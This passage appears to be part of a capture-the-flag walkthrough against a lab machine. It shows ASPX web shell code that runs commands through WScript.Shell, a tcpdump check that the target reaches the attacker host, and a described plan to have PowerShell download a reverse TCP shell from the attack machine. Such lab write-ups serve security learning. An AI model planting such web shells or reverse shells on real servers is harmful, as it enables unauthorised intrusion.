Based on the information from before, we know that we can execute aspx. This was done through math which proves itself from the loaded page from before Lets upload a shell.
Executing Commands via created script
Create a file called web.aspx with the following code.
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("")
o = cmd.StdOut.Readall()
Response.write(o)
%>
Next add that code to the end of the config file we created earlier
Set up a icmp listenin on our attack machine to see if there is communication between the server and us.
kali@kali:~$ sudo tcpdump -i tun0 icmp
[sudo] password for kali:
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
14:10:37.180009 IP 10.10.10.93 > 10.10.14.34: ICMP echo request, id 1, seq 1, length 40
14:10:37.180028 IP 10.10.14.34 > 10.10.10.93: ICMP echo reply, id 1, seq 1, length 40
14:10:38.187828 IP 10.10.10.93 > 10.10.14.34: ICMP echo request, id 1, seq 2, length 40
14:10:38.187846 IP 10.10.14.34 > 10.10.10.93: ICMP echo reply, id 1, seq 2, length 40
14:10:39.185159 IP 10.10.10.93 > 10.10.14.34: ICMP echo request, id 1, seq 3, length 40
14:10:39.185177 IP 10.10.14.34 > 10.10.10.93: ICMP echo reply, id 1, seq 3, length 40
14:10:40.184495 IP 10.10.10.93 > 10.10.14.34: ICMP echo request, id 1, seq 4, length 40
14:10:40.184509 IP 10.10.14.34 > 10.10.10.93: ICMP echo reply, id 1, seq 4, length 40
The server is communicating with us. That is good news.
Establishing Reverse Shell
At the bottom of the shell.ps1 script set up your listener with the following code.
Modified config file that will download our shell. This creates and object instance of a Windows shell. Then we use this instance to invoke Powershell in order to download the Powershell TCP shell from our exploit machine.
